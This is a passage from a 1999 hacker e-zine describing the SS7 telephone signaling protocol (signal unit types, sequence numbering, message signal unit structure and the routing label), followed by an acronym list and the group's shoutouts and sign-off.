LSSUs have a length indicator of 1) and MSUs have a length-indicator greater than 2. According to the protocol, only 6 of the 8 bits in the length indicator field are actually used to store this length; thus the largest value that can be accommodated in the length indicator is 63. For MSUs with more than 63 octets following the length indicator, the value of 63 is used. BSN/BIB FSN/FIB These octets hold the backwards sequence number (BSN), the backwards indicator bit (BIB), the forward sequence number (FSN), and the forward indicator bit (FIB). These fields are used to confirm receipt of SUs and to ensure that they are received in the order in which they were transmitted. They are also used to provide flow control. MSUs and LSSUs, when transmitted, are assigned a sequence number that is placed in the forward sequence number field of the outgoing SU. This SU is stored by the transmitting signaling point until it is acknowledged by the receiving signaling point. Since the 7 bits allocated to the forward sequence number can store 128 distinct values, it follows that a signaling point is restricted to sending 128 unacknowledged SUs before it must await an acknowledgment. By acknowledging an SU, the receiving node frees that SU's sequence number at the transmitting node, making it available for a new outgoing SU. Signaling points acknowledge receipt of SUs by placing the sequence number of the last correctly received and in-sequence SU in the backwards sequence number of every SU they transmit. In that way, they acknowledge all previously received SUs as well. The forward and backwards indicator bits are used to indicate sequencing or data-corruption errors and to request retransmission. 13. What are the Functions of the Different Signaling Units? FISUs themselves have no information payload. Their purpose is to occupy the link at those times when there are no LSSUs or MSUs to send. Because they undergo error checking, FISUs facilitate the constant monitoring of link quality in the absence of signaling traffic. FISUs can also be used to acknowledge the receipt of messages using the backwards sequence number and backwards indicator bit. LSSUs are used to communicate information about the signaling link between the nodes on either end of the link. This information is contained in the status field of the SU (see Figure 8). Because the two ends of a link are controlled by independent processors, there is a need to provide a means for them to communicate. LSSUs provide the means for performing this function. LSSUs are used primarily to signal the initiation of link alignment, the quality of received signaling traffic, and the status of the processors at either end of the link. Because they are sent only between the signaling points at either end of the link, LSSUs do not require any addressing information. MSUs are the workhorses of the SS7 network. All signaling associated with call setup and tear down, database query and response, and SS7 network management takes place using MSUs. MSUs are the basic envelope within which all addressed signaling information is placed. As will be shown below, there are several different types of MSUs. All MSUs have certain fields in common. Other fields differ according to the type of message. The type of MSU is indicated in the service-information octet shown in Figure 8; the addressing and informational content of the MSU is contained in the signaling information field. 14. Message Signal Unit Structure The functionality of the message signal unit lies in the actual content of the service information octet and the signaling information field (see Figure 8). The service information octet is an 8-bit field (as might be inferred from its name) that contains three types of information as follows: 1.Four bits are used to indicate the type of information contained in the signaling information field. They are referred to as the service indicator. The values most commonly used in American networks are outlined in Table 2. Table 2: Common Signaling Indicator Values Value Function 0 Signaling Network Management 1 Signaling Network Testing and Maintenance 3 Signaling Connection Control Part (SCCP) 5 ISDN User Part (ISUP) 2.Two bits are used to indicate whether the message is intended (and coded) f or use in a national or international network. They are generally coded with a value of 2, national network. 3.The remaining 2 bits are used (in American networks) to identify a message priority, from 0 to 3, with 3 being the highest priority. Message priorities do not control the order in which messages are transmitted; they are only used in cases of signaling network congestion. In that case, they indicate whether a message has sufficient priority to merit transmission during an instance of congestion and/or whether it can be discarded en route to a destination. The format of the contents of the signaling information field is determined by the service ndicator. (Within user parts, there are further distinctions in message formats, but the service indicator provides the first piece of information necessary for routing and/or decoding the message.) The first portion of the signaling information field is identical for all MSUs currently in use. It is referred to as the routing label. Simply stated, the routing label identifies the message originator, the intended destination of the message, and a field referred to as the signaling-link selection field which is used to distribute message traffic over the set of possible links and routes. The routing label consists of 7 octets that are outlined below in Table 3 (in order of transmission): Table 3: Routing Label Octet Group Function Number of Octets Involved Destination Point Code (DPC) Contains the address of the node to which the message is being sent 3 octets Originating Point Code (OPC) Contains the address of message originator 3 octets Signaling Link Selection (SLS) Distributes load among redundant routes 1 octet Point codes consist of the three-part identifier (network #, cluster #, member #), which uniquely identifies a signaling point. 16. Acronym List ACM Address Complete Message ANM Answer Message A Links Access Links BIB Backward Indicator Bit B Links Bridge Links BSN Backward Sequence Number D Links Diagonal Links DPC Destination Point Code E Link Extended Link F Link Fully Associated Link FIB Forward Indicator Bit FISU Fill in Signal Unit FSN Forward Sequence Number IAM Initial Address Message ISDN Integrated Services Digital Network ISUP ISDN User Part KPBS Kilobits per Second LSSU Link Status Signal Unit Mf Multifrequency MSU Message Signal Unit MTP Message Transfer Part OMAP Operations, Maintenance and Administration Part OPC Originating Point Code PSTN Public Switched Telephone Network RBOC Regional Bell Operating Company REL Release Message RCL Release Complete Message RSP Route Set Prohibited Test Message RSR Restricted Test Message SS7 Signaling System 7 SCCP Signaling Connection Control Part SCP Signal Control Point SLS Signaling Link Selection SSP Signal Switching Point STP Signal Transfer Point SU Signal Unit TCAP Transaction Capabilities Application Part TFA Transfer Allowed Message TFP Transfer Prohibited Message TFR Transfer Restricted Message Well, thats it. Shouts to d4rkcyde, 9x, b4b0, eVolution, downt1me, elf, substance, lowtek, digiphreak, gr1p, t1p, euk. darkcyde.8m.com. [----> ghost in the shell bbs <----] [----> o11 +44 (o)1xxx xxxxxx <----] [----> 24 hours. d4rkcyde (c) <----] g1ts.login: ---(OOooOO)--------Outness----------------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- ---(OOooOO)-------------------------------------------------------------(OOo- Werd, thats it for this issue. Thanks to everyone who submited shit, hopefuly next issue we'll have even more :> Keep on c0nf1n, k33p drink1ng l04dz 0f c4fF3n3, be 3l337. [C] 1999 D4RKCYDE Communications. darkcyde.8m.com #darkcyde EfNet.